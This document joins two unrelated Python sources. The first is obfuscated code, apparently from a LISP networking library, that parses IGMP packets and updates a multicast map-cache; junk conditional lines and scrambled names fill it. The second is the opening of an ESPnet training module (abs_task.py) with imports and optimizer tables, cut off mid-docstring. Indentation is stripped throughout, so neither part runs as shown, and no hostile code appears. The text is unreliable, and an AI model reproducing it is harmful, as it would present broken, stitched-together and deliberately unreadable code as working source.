if 8 - 8: I11i . I1ii11iIi11i % i1IIi + Ii1I
if 63 - 63: I1IiiI / OoooooooOO
if 16 - 16: OoOoOO00
if 67 - 67: O0 . I1Ii111
if 42 - 42: OoOoOO00 % I1ii11iIi11i * I1Ii111 * i1IIi . i1IIi % OOooOOo
if 90 - 90: oO0o * Oo0Ooo * oO0o . Ii1I * i1IIi
if 47 - 47: OOooOOo
if 38 - 38: I11i
if 15 - 15: OoO0O00 / ooOoO0o . OoO0O00 - iIii1I11I1II1 + OoooooooOO - OoO0O00
if 44 - 44: O0 . OOooOOo . o0oOOo0O0Ooo . I1ii11iIi11i - II111iiii
if 71 - 71: I1ii11iIi11i + o0oOOo0O0Ooo . i11iIiiIii * oO0o . i1IIi
if 40 - 40: OoO0O00 - IiII
if 43 - 43: I1Ii111 + i11iIiiIii % iII111i % I1Ii111 - ooOoO0o
if 85 - 85: IiII % iIii1I11I1II1 . I1Ii111
if 38 - 38: iII111i - I1IiiI / ooOoO0o
if 46 - 46: OOooOOo . O0 / i11iIiiIii . OOooOOo
if 19 - 19: I11i / Oo0Ooo + I1Ii111
if 43 - 43: I1ii11iIi11i
if 18 - 18: I11i / OOooOOo % I11i - o0oOOo0O0Ooo
if 22 - 22: iII111i
if 88 - 88: I11i + OoOoOO00 % IiII % OoO0O00 * O0 / OoooooooOO
if 83 - 83: IiII + I1Ii111 . I1ii11iIi11i * iIii1I11I1II1
if 9 - 9: ooOoO0o % IiII - OoOoOO00
if 66 - 66: oO0o % Oo0Ooo
if 40 - 40: i11iIiiIii . O0 * I11i - oO0o / OOooOOo . oO0o
if 86 - 86: OOooOOo - I1Ii111 * IiII - i1IIi + ooOoO0o + I11i
if 32 - 32: IiII
if 99 - 99: II111iiii
if 34 - 34: OOooOOo + OoOoOO00 * o0oOOo0O0Ooo + I1ii11iIi11i + IiII * i1IIi
if 73 - 73: I1ii11iIi11i - IiII - O0 . oO0o + Oo0Ooo % iII111i
if 68 - 68: I1ii11iIi11i - OoooooooOO
if 5 - 5: I1ii11iIi11i * I1IiiI + OoooooooOO / Oo0Ooo
if 18 - 18: OoO0O00 * iII111i % I1IiiI . OOooOOo * o0oOOo0O0Ooo
if 58 - 58: iII111i . IiII + iIii1I11I1II1
if 13 - 13: oO0o * I1Ii111 / I1Ii111 . I1IiiI
if 93 - 93: I11i % OoOoOO00 - OOooOOo + iIii1I11I1II1 / OoooooooOO % i11iIiiIii
if 90 - 90: oO0o % iIii1I11I1II1 + o0oOOo0O0Ooo - I11i / i11iIiiIii
if 57 - 57: I1IiiI . Oo0Ooo / I1IiiI / II111iiii - I1Ii111
if 68 - 68: I1IiiI
if 97 - 97: Ii1I + o0oOOo0O0Ooo / OoO0O00
if 97 - 97: i11iIiiIii % iIii1I11I1II1 + II111iiii
if 90 - 90: OOooOOo / I1IiiI
if 28 - 28: OoooooooOO + i1IIi
if 29 - 29: Oo0Ooo
if 98 - 98: OOooOOo / Oo0Ooo % Ii1I * OoooooooOO - oO0o
if 64 - 64: I1IiiI - I1IiiI
if 90 - 90: iII111i - I1IiiI - II111iiii / OOooOOo + Ii1I
if 34 - 34: i11iIiiIii + I1Ii111 / O0 / iIii1I11I1II1 * OoooooooOO % Ii1I
if 32 - 32: i11iIiiIii - OoOoOO00 / iIii1I11I1II1 * o0oOOo0O0Ooo % I1IiiI + O0
if 36 - 36: I1ii11iIi11i + I1ii11iIi11i % I1Ii111 * ooOoO0o * OoOoOO00
if 54 - 54: Oo0Ooo - I1IiiI % OOooOOo . I1ii11iIi11i / I1IiiI
if 75 - 75: OOooOOo - O0 % iII111i . Ii1I % I1ii11iIi11i + I1ii11iIi11i
if 32 - 32: Ii1I + II111iiii * IiII
if 9 - 9: I1Ii111
if 96 - 96: I1Ii111 / iIii1I11I1II1
if 48 - 48: iII111i * IiII + OoooooooOO
if 63 - 63: I1IiiI / Ii1I
if 31 - 31: i1IIi - oO0o
if 99 - 99: iII111i - i11iIiiIii + oO0o
if 66 - 66: Oo0Ooo * I11i . iIii1I11I1II1 - OoO0O00
if 11 - 11: I1Ii111 + iIii1I11I1II1 * O0 * Oo0Ooo
if 66 - 66: OoooooooOO % OoO0O00 + i11iIiiIii + I1Ii111 % OoO0O00
if 80 - 80: Oo0Ooo - Ii1I
if 54 - 54: O0 - iIii1I11I1II1 . OoO0O00 . IiII % OoO0O00
if 28 - 28: O0 % i1IIi % OoO0O00 / o0oOOo0O0Ooo . iIii1I11I1II1 - iII111i
if 50 - 50: o0oOOo0O0Ooo + iII111i / i1IIi % II111iiii
if 61 - 61: IiII
if 5 - 5: OOooOOo % iIii1I11I1II1 % O0 * i11iIiiIii / I1Ii111
if 48 - 48: IiII * oO0o
if 53 - 53: i1IIi * iIii1I11I1II1 . OOooOOo
if 68 - 68: IiII % IiII - iII111i . IiII + OoooooooOO
if 82 - 82: Ii1I . II111iiii / i1IIi * OoO0O00
if 80 - 80: I11i
if 96 - 96: i1IIi - I1ii11iIi11i * iII111i . OOooOOo . OoO0O00
if 93 - 93: oO0o * Oo0Ooo * IiII
if 26 - 26: o0oOOo0O0Ooo + O0 % i11iIiiIii . ooOoO0o . I1IiiI + Oo0Ooo
if 90 - 90: IiII * OoooooooOO + II111iiii / iII111i + i11iIiiIii / ooOoO0o
if 20 - 20: II111iiii % I1ii11iIi11i - OoooooooOO * Ii1I / I11i - OoooooooOO
if 11 - 11: I1IiiI + Ii1I + i11iIiiIii * I1ii11iIi11i - oO0o
if 46 - 46: OoooooooOO - Oo0Ooo
if 4 - 4: II111iiii . OOooOOo - Ii1I - i11iIiiIii
if 27 - 27: iII111i * iII111i - OoO0O00 % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 64 - 64: I1ii11iIi11i * ooOoO0o - OoooooooOO - I1IiiI
if 59 - 59: I1ii11iIi11i . I1Ii111 - OOooOOo / Oo0Ooo + OOooOOo . I1ii11iIi11i
if 69 - 69: Oo0Ooo
if 34 - 34: I1Ii111 - ooOoO0o . o0oOOo0O0Ooo
if 52 - 52: o0oOOo0O0Ooo % I11i * I11i / iIii1I11I1II1
if 77 - 77: OoOoOO00
if 67 - 67: OoooooooOO / OoooooooOO + IiII - ooOoO0o
if 72 - 72: Ii1I
if 21 - 21: ooOoO0o + iII111i
if 39 - 39: o0oOOo0O0Ooo % I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo
igmp_types = { 17 : "IGMP-query" , 18 : "IGMPv1-report" , 19 : "DVMRP" ,
20 : "PIMv1" , 22 : "IGMPv2-report" , 23 : "IGMPv2-leave" ,
30 : "mtrace-response" , 31 : "mtrace-request" , 34 : "IGMPv3-report" }
if 78 - 78: OoO0O00 / o0oOOo0O0Ooo / O0 % OOooOOo % i1IIi
lisp_igmp_record_types = { 1 : "include-mode" , 2 : "exclude-mode" ,
3 : "change-to-include" , 4 : "change-to-exclude" , 5 : "allow-new-source" ,
6 : "block-old-sources" }
if 78 - 78: o0oOOo0O0Ooo - oO0o . II111iiii
def lisp_process_igmp_packet ( packet ) :
O0O00Oo = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
O0O00Oo . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
O0O00Oo = bold ( "from {}" . format ( O0O00Oo . print_address_no_iid ( ) ) , False )
if 67 - 67: iII111i + I11i - OoO0O00 . OOooOOo * iIii1I11I1II1
O0OooO0oo = bold ( "Receive" , False )
lprint ( "{} {}-byte {}, IGMP packet: {}" . format ( O0OooO0oo , len ( packet ) , O0O00Oo ,
lisp_format_packet ( packet ) ) )
if 44 - 44: OoooooooOO * i1IIi % i1IIi - i11iIiiIii % OOooOOo - OoO0O00
if 62 - 62: OOooOOo + OoooooooOO / I1Ii111 % iIii1I11I1II1
if 59 - 59: i11iIiiIii . IiII
if 91 - 91: Oo0Ooo / iII111i + I1Ii111
IiI11I11 = ( struct . unpack ( "B" , packet [ 0 ] ) [ 0 ] & 0x0f ) * 4
if 30 - 30: I1Ii111 . i1IIi * OoooooooOO * OoooooooOO
if 43 - 43: OoooooooOO * O0
if 56 - 56: i1IIi / iIii1I11I1II1 - OoO0O00
if 77 - 77: I1IiiI + IiII - oO0o - I1ii11iIi11i * II111iiii + i1IIi
oO0ooOo = packet [ IiI11I11 : : ]
ooO0 = struct . unpack ( "B" , oO0ooOo [ 0 ] ) [ 0 ]
if 88 - 88: OoOoOO00 - Ii1I . O0 % I1Ii111 % I1ii11iIi11i
if 56 - 56: OoOoOO00 - iIii1I11I1II1 / I1IiiI - i1IIi / o0oOOo0O0Ooo * I11i
if 70 - 70: OOooOOo
if 11 - 11: I11i * II111iiii * Oo0Ooo + OOooOOo % i1IIi
if 73 - 73: OoO0O00 + O0 / Ii1I . OoooooooOO % iIii1I11I1II1 * i1IIi
oOoooOOO0o0 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
oOoooOOO0o0 . address = socket . ntohl ( struct . unpack ( "II" , oO0ooOo [ : 8 ] ) [ 1 ] )
iiIiII11i1 = oOoooOOO0o0 . print_address_no_iid ( )
if 84 - 84: o0oOOo0O0Ooo . iII111i / o0oOOo0O0Ooo + I1ii11iIi11i % OoO0O00
if ( ooO0 == 17 ) :
lprint ( "IGMP Query for group {}" . format ( iiIiII11i1 ) )
return ( True )
if 52 - 52: OoOoOO00 / Ii1I % OoOoOO00 % i11iIiiIii + I1IiiI / o0oOOo0O0Ooo
if 63 - 63: I1IiiI
iIIiI1I = ( ooO0 in ( 0x12 , 0x16 , 0x17 , 0x22 ) )
if ( iIIiI1I == False ) :
Ooooo0OOoo00 = "{} ({})" . format ( ooO0 , igmp_types [ ooO0 ] ) if igmp_types . has_key ( ooO0 ) else ooO0
if 71 - 71: I1Ii111
lprint ( "IGMP type {} not supported" . format ( Ooooo0OOoo00 ) )
return ( [ ] )
if 4 - 4: ooOoO0o * OoOoOO00 * o0oOOo0O0Ooo - iII111i - o0oOOo0O0Ooo * OOooOOo
if 91 - 91: OoOoOO00 * II111iiii % I1ii11iIi11i
if ( len ( oO0ooOo ) < 8 ) :
lprint ( "IGMP message too small" )
return ( [ ] )
if 89 - 89: OOooOOo - Oo0Ooo . I1ii11iIi11i - I1IiiI
if 1 - 1: iIii1I11I1II1
if 100 - 100: Oo0Ooo % OoooooooOO
if 28 - 28: oO0o . o0oOOo0O0Ooo
if 14 - 14: Oo0Ooo - I1Ii111 + Oo0Ooo / iII111i
if ( ooO0 == 0x17 ) :
lprint ( "IGMPv2 leave (*, {})" . format ( bold ( iiIiII11i1 , False ) ) )
return ( [ [ None , iiIiII11i1 , False ] ] )
if 61 - 61: Ii1I * Ii1I . OoOoOO00 + OoO0O00 * i11iIiiIii * OoO0O00
if ( ooO0 in ( 0x12 , 0x16 ) ) :
lprint ( "IGMPv{} join (*, {})" . format ( 1 if ( ooO0 == 0x12 ) else 2 , bold ( iiIiII11i1 , False ) ) )
if 4 - 4: OoooooooOO % iII111i % Oo0Ooo * IiII % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 66 - 66: I1IiiI . Oo0Ooo - oO0o
if 53 - 53: oO0o / Ii1I + oO0o + II111iiii
if 70 - 70: OoooooooOO - I1Ii111 + OoOoOO00
if 61 - 61: I1IiiI * I1Ii111 * i11iIiiIii
if ( iiIiII11i1 . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
else :
return ( [ [ None , iiIiII11i1 , True ] ] )
if 68 - 68: OoOoOO00 - iII111i - I1IiiI
if 37 - 37: iII111i - I1Ii111 + i1IIi / o0oOOo0O0Ooo % iII111i / iII111i
if 8 - 8: i1IIi % I11i
if 12 - 12: ooOoO0o / II111iiii + ooOoO0o * I1ii11iIi11i / i1IIi - iIii1I11I1II1
if 71 - 71: IiII - i11iIiiIii
return ( [ ] )
if 3 - 3: i11iIiiIii - o0oOOo0O0Ooo / oO0o . OoO0O00 * I11i + o0oOOo0O0Ooo
if 18 - 18: OoooooooOO % oO0o / IiII - ooOoO0o
if 80 - 80: I11i
if 98 - 98: iII111i / I1ii11iIi11i
if 87 - 87: iII111i - O0 * ooOoO0o / II111iiii % OoooooooOO . o0oOOo0O0Ooo
oOo0o0ooO0OOO = oOoooOOO0o0 . address
oO0ooOo = oO0ooOo [ 8 : : ]
if 55 - 55: OOooOOo - o0oOOo0O0Ooo * I1IiiI / o0oOOo0O0Ooo + I1Ii111 + iIii1I11I1II1
Iii111i1iI1 = "BBHI"
OoOOOoo = struct . calcsize ( Iii111i1iI1 )
IiIi111i = "I"
iiIiIiIi1 = struct . calcsize ( IiIi111i )
O0O00Oo = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 33 - 33: I1ii11iIi11i . OOooOOo + i1IIi - OoooooooOO * II111iiii
if 80 - 80: I11i % Oo0Ooo % I1Ii111 / OoO0O00 + II111iiii
if 40 - 40: Ii1I + O0 . i11iIiiIii % I11i / Oo0Ooo
if 25 - 25: IiII * IiII
o0ooO0OOOoO0o = [ ]
for i1i1IIIIIIIi in range ( oOo0o0ooO0OOO ) :
if ( len ( oO0ooOo ) < OoOOOoo ) : return
oooO000oO00 , OoOO0OOOO0 , oOoO0Oo0Oo , III1 = struct . unpack ( Iii111i1iI1 ,
oO0ooOo [ : OoOOOoo ] )
if 11 - 11: o0oOOo0O0Ooo / i1IIi / I11i * O0 + iII111i
oO0ooOo = oO0ooOo [ OoOOOoo : : ]
if 20 - 20: Ii1I * I1ii11iIi11i - I1Ii111 + I1IiiI - ooOoO0o
if ( lisp_igmp_record_types . has_key ( oooO000oO00 ) == False ) :
lprint ( "Invalid record type {}" . format ( oooO000oO00 ) )
continue
if 63 - 63: Ii1I + o0oOOo0O0Ooo - iII111i
if 1 - 1: O0 . I1IiiI . OoooooooOO . I1ii11iIi11i + I11i - i11iIiiIii
i1II1IIi = lisp_igmp_record_types [ oooO000oO00 ]
oOoO0Oo0Oo = socket . ntohs ( oOoO0Oo0Oo )
oOoooOOO0o0 . address = socket . ntohl ( III1 )
iiIiII11i1 = oOoooOOO0o0 . print_address_no_iid ( )
if 100 - 100: II111iiii + oO0o
lprint ( "Record type: {}, group: {}, source-count: {}" . format ( i1II1IIi , iiIiII11i1 , oOoO0Oo0Oo ) )
if 85 - 85: I1ii11iIi11i % I1ii11iIi11i . Ii1I
if 42 - 42: oO0o + OoO0O00
if 16 - 16: Ii1I
if 67 - 67: I1ii11iIi11i . OoooooooOO * I1Ii111 + Ii1I * OOooOOo
if 84 - 84: OOooOOo
if 78 - 78: O0 % O0
if 72 - 72: o0oOOo0O0Ooo * IiII / II111iiii / iIii1I11I1II1
i11iI = False
if ( oooO000oO00 in ( 1 , 5 ) ) : i11iI = True
if ( oooO000oO00 in ( 2 , 4 ) and oOoO0Oo0Oo == 0 ) : i11iI = True
o00i1I1 = "join" if ( i11iI ) else "leave"
if 45 - 45: ooOoO0o
if 52 - 52: I1ii11iIi11i % Ii1I - iIii1I11I1II1 . ooOoO0o % I1IiiI
if 57 - 57: OoO0O00 % Ii1I
if 11 - 11: OoO0O00
if ( iiIiII11i1 . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
continue
if 74 - 74: OoO0O00 - OOooOOo - ooOoO0o - iIii1I11I1II1
if 29 - 29: ooOoO0o
if 31 - 31: o0oOOo0O0Ooo / IiII - oO0o / OoOoOO00 * IiII * i1IIi
if 45 - 45: OoOoOO00 + iII111i % iIii1I11I1II1 - IiII * OOooOOo
if 62 - 62: Ii1I / Oo0Ooo / I1ii11iIi11i . OoOoOO00 % ooOoO0o * IiII
if 97 - 97: ooOoO0o
if 14 - 14: iII111i + iII111i
if 62 - 62: ooOoO0o / OOooOOo * I1ii11iIi11i + Oo0Ooo - OoooooooOO - OoooooooOO
if ( oOoO0Oo0Oo == 0 ) :
o0ooO0OOOoO0o . append ( [ None , iiIiII11i1 , i11iI ] )
lprint ( "IGMPv3 {} (*, {})" . format ( bold ( o00i1I1 , False ) ,
bold ( iiIiII11i1 , False ) ) )
if 19 - 19: Ii1I . oO0o
if 26 - 26: OOooOOo + II111iiii
if 67 - 67: IiII + OoOoOO00 * I1ii11iIi11i % o0oOOo0O0Ooo / oO0o
if 31 - 31: ooOoO0o / Ii1I . Ii1I - I1IiiI - Oo0Ooo . II111iiii
if 82 - 82: Oo0Ooo % Oo0Ooo
for Oo0iIIiiIiiI in range ( oOoO0Oo0Oo ) :
if ( len ( oO0ooOo ) < iiIiIiIi1 ) : return
III1 = struct . unpack ( IiIi111i , oO0ooOo [ : iiIiIiIi1 ] ) [ 0 ]
O0O00Oo . address = socket . ntohl ( III1 )
I1iI1I1i1II = O0O00Oo . print_address_no_iid ( )
o0ooO0OOOoO0o . append ( [ I1iI1I1i1II , iiIiII11i1 , i11iI ] )
lprint ( "{} ({}, {})" . format ( o00i1I1 ,
green ( I1iI1I1i1II , False ) , bold ( iiIiII11i1 , False ) ) )
oO0ooOo = oO0ooOo [ iiIiIiIi1 : : ]
if 99 - 99: Oo0Ooo - ooOoO0o . OoO0O00 - Oo0Ooo / O0
if 42 - 42: Ii1I - OoOoOO00 . OoOoOO00
if 88 - 88: o0oOOo0O0Ooo . Ii1I . iII111i * iII111i + i11iIiiIii
if 68 - 68: OoooooooOO
if 5 - 5: OoOoOO00 . i11iIiiIii . OOooOOo / I11i * Oo0Ooo % Oo0Ooo
if 44 - 44: I1ii11iIi11i + oO0o % i1IIi + OoooooooOO
if 42 - 42: I1Ii111 / I1Ii111 - O0
if 79 - 79: i11iIiiIii
return ( o0ooO0OOOoO0o )
if 96 - 96: iIii1I11I1II1 . OoOoOO00 . OOooOOo / iII111i
if 59 - 59: Oo0Ooo + OOooOOo / Oo0Ooo
if 49 - 49: OoO0O00 / Oo0Ooo % OoOoOO00 % i1IIi
if 66 - 66: OoOoOO00 % II111iiii
if 16 - 16: i11iIiiIii - I1IiiI + ooOoO0o * oO0o
if 30 - 30: II111iiii / o0oOOo0O0Ooo
if 57 - 57: I11i / I1ii11iIi11i . I11i
if 68 - 68: OoOoOO00 + O0 . I1IiiI
lisp_geid = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 26 - 26: I1ii11iIi11i
def lisp_glean_map_cache ( seid , rloc , encap_port , igmp ) :
if 98 - 98: Oo0Ooo
if 72 - 72: oO0o + OoooooooOO . O0 + IiII
if 49 - 49: i1IIi - i11iIiiIii + II111iiii + Ii1I / OoO0O00
if 34 - 34: I1ii11iIi11i * i11iIiiIii
if 6 - 6: I1ii11iIi11i + I1IiiI / OoooooooOO % I11i * Oo0Ooo
if 20 - 20: Oo0Ooo
o00OO00ooOOO = True
OoOoooooO00oo = lisp_map_cache . lookup_cache ( seid , True )
if ( OoOoooooO00oo and len ( OoOoooooO00oo . rloc_set ) != 0 ) :
OoOoooooO00oo . last_refresh_time = lisp_get_timestamp ( )
if 24 - 24: ooOoO0o / I1Ii111
O0o0o0o00OoOo = OoOoooooO00oo . rloc_set [ 0 ]
I11O0 = O0o0o0o00OoOo . rloc
II1Ii1II = O0o0o0o00OoOo . translated_port
o00OO00ooOOO = ( I11O0 . is_exact_match ( rloc ) == False or
II1Ii1II != encap_port )
if 8 - 8: o0oOOo0O0Ooo / IiII + iIii1I11I1II1 % i1IIi * OoOoOO00 / i11iIiiIii
if ( o00OO00ooOOO ) :
o0OoO00 = green ( seid . print_address ( ) , False )
O0OooO0oo = red ( rloc . print_address_no_iid ( ) + ":" + str ( encap_port ) , False )
lprint ( "Change gleaned EID {} to RLOC {}" . format ( o0OoO00 , O0OooO0oo ) )
O0o0o0o00OoOo . delete_from_rloc_probe_list ( OoOoooooO00oo . eid , OoOoooooO00oo . group )
lisp_change_gleaned_multicast ( seid , rloc , encap_port )
if 11 - 11: OoooooooOO * i11iIiiIii
else :
OoOoooooO00oo = lisp_mapping ( "" , "" , [ ] )
OoOoooooO00oo . eid . copy_address ( seid )
OoOoooooO00oo . mapping_source . copy_address ( rloc )
OoOoooooO00oo . map_cache_ttl = LISP_GLEAN_TTL
OoOoooooO00oo . gleaned = True
o0OoO00 = green ( seid . print_address ( ) , False )
O0OooO0oo = red ( rloc . print_address_no_iid ( ) + ":" + str ( encap_port ) , False )
lprint ( "Add gleaned EID {} to map-cache with RLOC {}" . format ( o0OoO00 , O0OooO0oo ) )
OoOoooooO00oo . add_cache ( )
if 31 - 31: o0oOOo0O0Ooo / iIii1I11I1II1
if 79 - 79: O0
if 50 - 50: IiII % OoOoOO00 . OoOoOO00 + ooOoO0o * OoOoOO00 * OoooooooOO
if 22 - 22: OoOoOO00 + I1ii11iIi11i * iIii1I11I1II1 + iIii1I11I1II1
if 100 - 100: iII111i - ooOoO0o + I11i - oO0o * i1IIi
if ( o00OO00ooOOO ) :
IiIIIi = lisp_rloc ( )
IiIIIi . store_translated_rloc ( rloc , encap_port )
IiIIIi . add_to_rloc_probe_list ( OoOoooooO00oo . eid , OoOoooooO00oo . group )
IiIIIi . priority = 253
IiIIIi . mpriority = 255
iio0OOoO0 = [ IiIIIi ]
OoOoooooO00oo . rloc_set = iio0OOoO0
OoOoooooO00oo . build_best_rloc_set ( )
if 62 - 62: OoO0O00 / OoOoOO00 * OoOoOO00
if 83 - 83: oO0o * o0oOOo0O0Ooo
if 25 - 25: o0oOOo0O0Ooo % Oo0Ooo . Oo0Ooo + OoO0O00
if 23 - 23: I11i + I1ii11iIi11i * iIii1I11I1II1 - i1IIi
if 33 - 33: I1IiiI + o0oOOo0O0Ooo . OoOoOO00
if ( igmp == None ) : return
if 35 - 35: iII111i / Ii1I
if 57 - 57: ooOoO0o . I1IiiI * OOooOOo
if 87 - 87: I11i - I11i % iII111i - Ii1I
if 29 - 29: oO0o - ooOoO0o * iIii1I11I1II1 / OoOoOO00
if 34 - 34: I1IiiI . Oo0Ooo
lisp_geid . instance_id = seid . instance_id
if 4 - 4: Ii1I - II111iiii * iII111i / oO0o - I1IiiI
if 32 - 32: iIii1I11I1II1 - I11i
if 49 - 49: I11i * I1Ii111 - iIii1I11I1II1 * O0
if 72 - 72: I1IiiI * iII111i
if 61 - 61: Ii1I * Oo0Ooo * I1Ii111 % I11i + iII111i % oO0o
iiIi1 = lisp_process_igmp_packet ( igmp )
if ( type ( iiIi1 ) == bool ) : return
if 67 - 67: IiII
for O0O00Oo , oOoooOOO0o0 , i11iI in iiIi1 :
if ( O0O00Oo != None ) : continue
if 90 - 90: o0oOOo0O0Ooo
if 5 - 5: i1IIi
if 55 - 55: Ii1I
if 46 - 46: OOooOOo / iII111i . i1IIi . i11iIiiIii . iIii1I11I1II1 % I11i
lisp_geid . store_address ( oOoooOOO0o0 )
oooO0O0OOOoo , OoOO0OOOO0 , oOoOoO0Oo0oo = lisp_allow_gleaning ( seid , lisp_geid , rloc )
if ( oooO0O0OOOoo == False ) : continue
if 62 - 62: I11i % II111iiii % OoooooooOO * ooOoO0o / oO0o
if ( i11iI ) :
lisp_build_gleaned_multicast ( seid , lisp_geid , rloc , encap_port ,
True )
else :
lisp_remove_gleaned_multicast ( seid , lisp_geid )
if 29 - 29: o0oOOo0O0Ooo / O0 / OoO0O00
if 23 - 23: Ii1I + i11iIiiIii % IiII
if 64 - 64: i11iIiiIii + OoooooooOO . oO0o * Ii1I
if 49 - 49: O0
if 72 - 72: I1Ii111
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
abs_task.py | from abc import ABC
from abc import abstractmethod
import argparse
from contextlib import contextmanager
from distutils.version import LooseVersion
import functools
import logging
import os
from pathlib import Path
import sys
from typing import Any
from typing import Callable
from typing import Dict
from typing import List
from typing import Optional
from typing import Sequence
from typing import Tuple
from typing import Union
import humanfriendly
import numpy as np
import torch
import torch.multiprocessing
import torch.nn
import torch.optim
from torch.utils.data import DataLoader
from typeguard import check_argument_types
from typeguard import check_return_type
import yaml
from espnet.utils.cli_utils import get_commandline_args
from espnet2.iterators.abs_iter_factory import AbsIterFactory
from espnet2.iterators.chunk_iter_factory import ChunkIterFactory
from espnet2.iterators.multiple_iter_factory import MultipleIterFactory
from espnet2.iterators.sequence_iter_factory import SequenceIterFactory
from espnet2.main_funcs.average_nbest_models import average_nbest_models
from espnet2.main_funcs.collect_stats import collect_stats
from espnet2.optimizers.sgd import SGD
from espnet2.samplers.build_batch_sampler import BATCH_TYPES
from espnet2.samplers.build_batch_sampler import build_batch_sampler
from espnet2.samplers.unsorted_batch_sampler import UnsortedBatchSampler
from espnet2.schedulers.abs_scheduler import AbsScheduler
from espnet2.schedulers.noam_lr import NoamLR
from espnet2.schedulers.warmup_lr import WarmupLR
from espnet2.torch_utils.load_pretrained_model import load_pretrained_model
from espnet2.torch_utils.model_summary import model_summary
from espnet2.torch_utils.pytorch_version import pytorch_cudnn_version
from espnet2.torch_utils.set_all_random_seed import set_all_random_seed
from espnet2.train.abs_espnet_model import AbsESPnetModel
from espnet2.train.class_choices import ClassChoices
from espnet2.train.dataset import DATA_TYPES
from espnet2.train.dataset import ESPnetDataset
from espnet2.train.distributed_utils import DistributedOption
from espnet2.train.distributed_utils import free_port
from espnet2.train.distributed_utils import get_master_port
from espnet2.train.distributed_utils import get_node_rank
from espnet2.train.distributed_utils import get_num_nodes
from espnet2.train.distributed_utils import resolve_distributed_mode
from espnet2.train.iterable_dataset import IterableESPnetDataset
from espnet2.train.reporter import Reporter
from espnet2.train.trainer import Trainer
from espnet2.utils.build_dataclass import build_dataclass
from espnet2.utils import config_argparse
from espnet2.utils.get_default_kwargs import get_default_kwargs
from espnet2.utils.nested_dict_action import NestedDictAction
from espnet2.utils.types import humanfriendly_parse_size_or_none
from espnet2.utils.types import int_or_none
from espnet2.utils.types import str2bool
from espnet2.utils.types import str2triple_str
from espnet2.utils.types import str_or_int
from espnet2.utils.types import str_or_none
from espnet2.utils.yaml_no_alias_safe_dump import yaml_no_alias_safe_dump
if LooseVersion(torch.__version__) >= LooseVersion("1.5.0"):
from torch.multiprocessing.spawn import ProcessContext
else:
from torch.multiprocessing.spawn import SpawnContext as ProcessContext
optim_classes = dict(
adam=torch.optim.Adam,
sgd=SGD,
adadelta=torch.optim.Adadelta,
adagrad=torch.optim.Adagrad,
adamax=torch.optim.Adamax,
asgd=torch.optim.ASGD,
lbfgs=torch.optim.LBFGS,
rmsprop=torch.optim.RMSprop,
rprop=torch.optim.Rprop,
)
if LooseVersion(torch.__version__) >= LooseVersion("1.2.0"):
optim_classes["adamw"] = torch.optim.AdamW
try:
import torch_optimizer
optim_classes.update(
accagd=torch_optimizer.AccSGD,
adabound=torch_optimizer.AdaBound,
adamod=torch_optimizer.AdaMod,
diffgrad=torch_optimizer.DiffGrad,
lamb=torch_optimizer.Lamb,
novograd=torch_optimizer.NovoGrad,
pid=torch_optimizer.PID,
# torch_optimizer<=0.0.1a10 doesn't support
# qhadam=torch_optimizer.QHAdam,
qhm=torch_optimizer.QHM,
radam=torch_optimizer.RAdam,
sgdw=torch_optimizer.SGDW,
yogi=torch_optimizer.Yogi,
)
del torch_optimizer
except ImportError:
pass
try:
import apex
optim_classes.update(
fusedadam=apex.optimizers.FusedAdam,
fusedlamb=apex.optimizers.FusedLAMB,
fusednovograd=apex.optimizers.FusedNovoGrad,
fusedsgd=apex.optimizers.FusedSGD,
)
del apex
except ImportError:
pass
if LooseVersion(torch.__version__) >= LooseVersion("1.6.0"):
from torch.cuda.amp import autocast
from torch.cuda.amp import GradScaler
else:
# Nothing to do if torch<1.6.0
@contextmanager
def autocast(enabled=True):
yield
GradScaler = None
scheduler_classes = dict(
ReduceLROnPlateau=torch.optim.lr_scheduler.ReduceLROnPlateau,
lambdalr=torch.optim.lr_scheduler.LambdaLR,
steplr=torch.optim.lr_scheduler.StepLR,
multisteplr=torch.optim.lr_scheduler.MultiStepLR,
exponentiallr=torch.optim.lr_scheduler.ExponentialLR,
CosineAnnealingLR=torch.optim.lr_scheduler.CosineAnnealingLR,
)
if LooseVersion(torch.__version__) >= LooseVersion("1.1.0"):
scheduler_classes.update(
noamlr=NoamLR, warmuplr=WarmupLR,
)
if LooseVersion(torch.__version__) >= LooseVersion("1.3.0"):
CosineAnnealingWarmRestarts = torch.optim.lr_scheduler.CosineAnnealingWarmRestarts
scheduler_classes.update(
cycliclr=torch.optim.lr_scheduler.CyclicLR,
onecyclelr=torch.optim.lr_scheduler.OneCycleLR,
CosineAnnealingWarmRestarts=CosineAnnealingWarmRestarts,
)
# To lower keys
optim_classes = {k.lower(): v for k, v in optim_classes.items()}
scheduler_classes = {k.lower(): v for k, v in scheduler_classes.items()}
class AbsTask(ABC):
# Use @staticmethod, or @classmethod,
# instead of instance method to avoid God classes
# If you need more than one optimizers, change this value in inheritance
num_optimizers: int = 1
trainer = Trainer
class_choices_list: List[ClassChoices] = []
def __init__(self):
raise RuntimeError("This class can't be instantiated.")
@classmethod
@abstractmethod
def add_task_arguments(cls, parser: argparse.ArgumentParser):
pass
@classmethod
@abstractmethod
def build_collate_fn(
cls, args: argparse.Namespace
) -> Callable[[Sequence[Dict[str, np.ndarray]]], Dict[str, torch.Tensor]]:
"""Return "collate_fn", which is a callable object and given to DataLoader.
>>> from torch.utils.data import DataLoader
>>> loader = DataLoader(collate_fn=cls.build_collate_fn(args), ...)
In many cases, you can use our common collate_fn.
"""
raise NotImplementedError
@classmethod
@abstractmethod
def build_preprocess_fn(
cls, args: argparse.Namespace, train: bool
) -> Optional[Callable[[str, Dict[str, np.array]], Dict[str, np.ndarray]]]:
raise NotImplementedError
@classmethod
@abstractmethod
def required_data_names(cls, inference: bool = False) -> Tuple[str, ...]:
"""Define the required names by Task
This function is used by
>>> cls.check_task_requirements()
If your model is defined as following,
>>> from espnet2.train.abs_espnet_model import AbsESPnetModel
>>> class Model(AbsESPnetModel):
... def forward(self, input, output, opt=None): pass
